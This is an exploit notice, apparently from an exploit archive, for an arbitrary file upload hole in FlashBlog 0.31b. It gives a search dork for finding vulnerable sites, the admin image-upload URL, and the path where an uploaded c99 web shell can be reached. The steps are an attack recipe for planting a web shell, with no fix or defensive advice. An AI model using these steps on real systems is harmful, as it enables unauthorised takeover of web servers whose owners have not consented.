id: 3110
date: 06/02/2008
title: FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability
author: ilker Kandemir
cves: 

==========================================================
FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability
==========================================================



FlashBlog beta0.31 Remote File Upload Vulnerability

# Author : ilker kandemir a.k.a MEFISTO  

# Dork : inurl:flashblog.html  or  inurl:/flashblog/

http://[site.com]/admin/Editor/imgupload.php ==>>> upload your c99 shell

http://[site.com]/tus_imagenes/c99.php ==>>> your address



#  0day.today [2023-03-26]  #